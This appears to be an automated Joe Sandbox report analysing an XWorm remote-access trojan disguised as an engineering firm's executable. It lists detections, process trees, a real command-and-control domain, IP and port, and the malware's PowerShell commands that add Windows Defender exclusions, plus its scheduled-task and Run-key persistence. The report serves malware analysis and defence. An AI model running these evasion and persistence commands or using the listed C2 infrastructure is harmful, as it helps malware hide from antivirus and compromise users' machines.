Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SS Bottmac Engineers Pvt. Ltd..exe

Overview

General Information

Sample name:SS Bottmac Engineers Pvt. Ltd..exe
Analysis ID:1545926
MD5:ff9e45d7326698f34526793bf1244811
SHA1:b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
SHA256:4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
Tags:exeuser-lowmal3
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 5148 cmdline: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • powershell.exe (PID: 5876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SS Bottmac Engineers Pvt. Ltd..exe (PID: 7264 cmdline: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
      • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • RTUZKYTc.exe (PID: 7324 cmdline: C:\Users\user\AppData\Roaming\RTUZKYTc.exe MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 7676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RTUZKYTc.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\RTUZKYTc.exe" MD5: FF9E45D7326698F34526793BF1244811)
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 1992 cmdline: "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 3652 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 7608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7720:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x77bd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x78d2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x73ce:$cnc4: POST / HTTP/1.1
    00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x843c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x84d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x85ee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x80ea:$cnc4: POST / HTTP/1.1
      00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.RTUZKYTc.exe.319a66c.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          10.2.RTUZKYTc.exe.319a66c.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x5b20:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x5bbd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5cd2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x57ce:$cnc4: POST / HTTP/1.1
          0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x5b20:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x5bbd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5cd2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x57ce:$cnc4: POST / HTTP/1.1
            27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 31 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 7264, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', ProcessId: 7500, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SS Bottmac Engineers Pvt. Ltd.
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ProcessId: 7264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RTUZKYTc.exe, ParentImage: C:\Users\user\AppData\Roaming\RTUZKYTc.exe, ParentProcessId: 7324, ParentProcessName: RTUZKYTc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", ProcessId: 7676, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", ProcessId: 6800, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", ProcessId: 6800, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T10:34:03.831754+010028531931Malware Command and Control Activity Detected192.168.2.550035104.223.35.764068TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeReversingLabs: Detection: 39%
              Multi AV Scanner detection for submitted file
              Source: SS Bottmac Engineers Pvt. Ltd..exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: SS Bottmac Engineers Pvt. Ltd..exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpackString decryptor: kanrplest.duckdns.org
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpackString decryptor: 4068
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpackString decryptor: <123456789>
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpackString decryptor: <Xwormmm>
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpackString decryptor: USB.exe
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
              Source: Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50014 -> 104.223.35.76:4068
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50035 -> 104.223.35.76:4068
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: kanrplest.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: kanrplest.duckdns.org
              Yara detected Generic Downloader
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.5:49764 -> 104.223.35.76:4068
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: kanrplest.duckdns.org
              Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: powershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
              Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
